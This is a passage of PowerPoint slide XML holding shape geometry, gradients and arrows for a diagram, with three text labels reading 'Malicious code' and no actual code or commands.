                  <a:gd name="connsiteX6" fmla="*/ 1667 w 10000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9759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  <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                  <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                  <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                  <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                  <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                  <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                  <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                  <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                  <a:gd name="connsiteY6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26" h="10000">
                    <a:moveTo>
                      <a:pt x="3093" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11426" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10505" y="0"/>
                      <a:pt x="8333" y="2239"/>
                      <a:pt x="8333" y="5000"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8333" y="7761"/>
                      <a:pt x="10505" y="10000"/>
                      <a:pt x="11426" y="10000"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3093" y="10000"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2172" y="10000"/>
                      <a:pt x="0" y="7761"/>
                      <a:pt x="0" y="5000"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2239"/>
                      <a:pt x="2172" y="0"/>
                      <a:pt x="3093" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59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/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="2410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39700" prst="cross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Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880" cy="1191153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                  <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                  <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                  <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                  <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                  <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                  <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                  <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                  <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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561" h="1104621">
                    <a:moveTo>
                      <a:pt x="0" y="30034"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="160187" y="-10012"/>
                      <a:pt x="320374" y="-10012"/>
                      <a:pt x="480561" y="30034"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="480561" y="1104621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1104621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300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tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="10800000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow>
                  <a:schemeClr val="bg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Rounded Rectangle 336"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:softEdge rad="0"/>
              </a:effectLst>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d extrusionH="76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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Rounded Rectangle 337"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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 extrusionH="76200" contourW="12700">
                <a:bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:extrusionClr>
                <a:contourClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="1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9" name="Picture 3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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805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3786833" y="1576112"/>
            <a:ext cx="1289983" cy="1994819"/>
            <a:chOff x="6093362" y="1106972"/>
            <a:chExt cx="853157" cy="1319315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Freeform 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6120540" y="1124513"/>
              <a:ext cx="820114" cy="1290790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY0" fmla="*/ 287618 h 1352176"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 859117"/>
                <a:gd name="connsiteY1" fmla="*/ 1139265 h 1352176"/>
                <a:gd name="connsiteX2" fmla="*/ 85912 w 859117"/>
                <a:gd name="connsiteY2" fmla="*/ 1243853 h 1352176"/>
                <a:gd name="connsiteX3" fmla="*/ 190500 w 859117"/>
                <a:gd name="connsiteY3" fmla="*/ 1299882 h 1352176"/>
                <a:gd name="connsiteX4" fmla="*/ 332441 w 859117"/>
                <a:gd name="connsiteY4" fmla="*/ 1352176 h 1352176"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 859117"/>
                <a:gd name="connsiteY5" fmla="*/ 1333500 h 1352176"/>
                <a:gd name="connsiteX6" fmla="*/ 859117 w 859117"/>
                <a:gd name="connsiteY6" fmla="*/ 1064559 h 1352176"/>
                <a:gd name="connsiteX7" fmla="*/ 847912 w 859117"/>
                <a:gd name="connsiteY7" fmla="*/ 216647 h 1352176"/>
                <a:gd name="connsiteX8" fmla="*/ 481853 w 859117"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1352176"/>
                <a:gd name="connsiteX9" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY9" fmla="*/ 287618 h 1352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9117" h="1352176">
                  <a:moveTo>
                    <a:pt x="3735" y="287618"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1139265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85912" y="1243853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="1299882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332441" y="1352176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859117" y="1064559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847912" y="216647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481853" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3735" y="2876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093362" y="1106972"/>
              <a:ext cx="853157" cy="131931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097976" y="2103191"/>
            <a:ext cx="1115346" cy="403924"/>
            <a:chOff x="5097976" y="2334691"/>
            <a:chExt cx="1115346" cy="403924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Right Arrow 340"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5097976" y="2334691"/>
              <a:ext cx="1115346" cy="209920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284847" y="2399716"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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13849" y="2759736"/>
            <a:ext cx="2691496" cy="398975"/>
            <a:chOff x="5113849" y="2991236"/>
            <a:chExt cx="2691496" cy="398975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="345" name="Right Arrow 344"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5113849" y="2991236"/>
              <a:ext cx="2691496" cy="209920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278878" y="3051312"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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37143" y="3407457"/>
            <a:ext cx="1590012" cy="402316"/>
            <a:chOff x="4637143" y="3638957"/>
            <a:chExt cx="1590012" cy="402316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Right Arrow 346"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4637143" y="3638957"/>
              <a:ext cx="1590012" cy="209920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279866" y="3702374"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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95" name="Rounded Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772775" y="1550858"/>
            <a:ext cx="1323545" cy="2190275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX4" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX5" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX6" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX4" fmla="*/ 1307825 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1648705 h 2291881"/>
              <a:gd name="connsiteX5" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX6" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX4" fmla="*/ 1307825 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1648705 h 2291881"/>
              <a:gd name="connsiteX5" fmla="*/ 789339 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 2167190 h 2291881"/>
              <a:gd name="connsiteX6" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX4" fmla="*/ 1307825 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1648705 h 2291881"/>
              <a:gd name="connsiteX5" fmla="*/ 747776 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 2056354 h 2291881"/>
              <a:gd name="connsiteX6" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2291881"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX4" fmla="*/ 1307825 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1648705 h 2291881"/>
              <a:gd name="connsiteX5" fmla="*/ 623085 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 1959372 h 2291881"/>
              <a:gd name="connsiteX6" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2291881 h 2291881"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2291881"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2291881"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX4" fmla="*/ 1307825 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1648705 h 2193333"/>
              <a:gd name="connsiteX5" fmla="*/ 623085 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 1959372 h 2193333"/>
              <a:gd name="connsiteX6" fmla="*/ 199831 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2111772 h 2193333"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2193333"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1321680"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1321680"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX3" fmla="*/ 1321680 w 1321680"/>
              <a:gd name="connsiteY3" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX4" fmla="*/ 1314876 w 1321680"/>
              <a:gd name="connsiteY4" fmla="*/ 1634745 h 2193333"/>
              <a:gd name="connsiteX5" fmla="*/ 623085 w 1321680"/>
              <a:gd name="connsiteY5" fmla="*/ 1959372 h 2193333"/>
              <a:gd name="connsiteX6" fmla="*/ 199831 w 1321680"/>
              <a:gd name="connsiteY6" fmla="*/ 2111772 h 2193333"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2193333"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1321680"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1314876"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1314876"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX3" fmla="*/ 1314629 w 1314876"/>
              <a:gd name="connsiteY3" fmla="*/ 123684 h 2193333"/>
              <a:gd name="connsiteX4" fmla="*/ 1314876 w 1314876"/>
              <a:gd name="connsiteY4" fmla="*/ 1634745 h 2193333"/>
              <a:gd name="connsiteX5" fmla="*/ 623085 w 1314876"/>
              <a:gd name="connsiteY5" fmla="*/ 1959372 h 2193333"/>
              <a:gd name="connsiteX6" fmla="*/ 199831 w 1314876"/>
              <a:gd name="connsiteY6" fmla="*/ 2111772 h 2193333"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2193333"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1314876"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1314876"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2193333"/>
              <a:gd name="connsiteX3" fmla="*/ 1314629 w 1314876"/>
              <a:gd name="connsiteY3" fmla="*/ 123684 h 2193333"/>
              <a:gd name="connsiteX4" fmla="*/ 1314876 w 1314876"/>
              <a:gd name="connsiteY4" fmla="*/ 1634745 h 2193333"/>
              <a:gd name="connsiteX5" fmla="*/ 750014 w 1314876"/>
              <a:gd name="connsiteY5" fmla="*/ 1910511 h 2193333"/>
              <a:gd name="connsiteX6" fmla="*/ 199831 w 1314876"/>
              <a:gd name="connsiteY6" fmla="*/ 2111772 h 2193333"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2193333"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2193333"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2190275"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1314876"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2190275"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1314876"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2190275"/>
              <a:gd name="connsiteX3" fmla="*/ 1314629 w 1314876"/>
              <a:gd name="connsiteY3" fmla="*/ 123684 h 2190275"/>
              <a:gd name="connsiteX4" fmla="*/ 1314876 w 1314876"/>
              <a:gd name="connsiteY4" fmla="*/ 1634745 h 2190275"/>
              <a:gd name="connsiteX5" fmla="*/ 750014 w 1314876"/>
              <a:gd name="connsiteY5" fmla="*/ 1910511 h 2190275"/>
              <a:gd name="connsiteX6" fmla="*/ 573566 w 1314876"/>
              <a:gd name="connsiteY6" fmla="*/ 2076871 h 2190275"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2190275"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 2190275"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY0" fmla="*/ 116704 h 2190275"/>
              <a:gd name="connsiteX1" fmla="*/ 116704 w 1314876"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2190275"/>
              <a:gd name="connsiteX2" fmla="*/ 1204976 w 1314876"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2190275"/>
              <a:gd name="connsiteX3" fmla="*/ 1314629 w 1314876"/>
              <a:gd name="connsiteY3" fmla="*/ 123684 h 2190275"/>
              <a:gd name="connsiteX4" fmla="*/ 1314876 w 1314876"/>
              <a:gd name="connsiteY4" fmla="*/ 1634745 h 2190275"/>
              <a:gd name="connsiteX5" fmla="*/ 827581 w 1314876"/>
              <a:gd name="connsiteY5" fmla="*/ 1889570 h 2190275"/>
              <a:gd name="connsiteX6" fmla="*/ 573566 w 1314876"/>
              <a:gd name="connsiteY6" fmla="*/ 2076871 h 2190275"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY7" fmla="*/ 2175177 h 2190275"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1314876"/>
              <a:gd name="connsiteY8" fmla="*/ 116704 h 219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4876" h="2190275">
                <a:moveTo>
                  <a:pt x="0" y="116704"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="52250"/>
                  <a:pt x="52250" y="0"/>
                  <a:pt x="116704" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1204976" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1269430" y="0"/>
                  <a:pt x="1314629" y="59230"/>
                  <a:pt x="1314629" y="123684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1314629" y="809842"/>
                  <a:pt x="1314876" y="948587"/>
                  <a:pt x="1314876" y="1634745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1314876" y="1699199"/>
                  <a:pt x="892035" y="1889570"/>
                  <a:pt x="827581" y="1889570"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="573566" y="2076871"/>
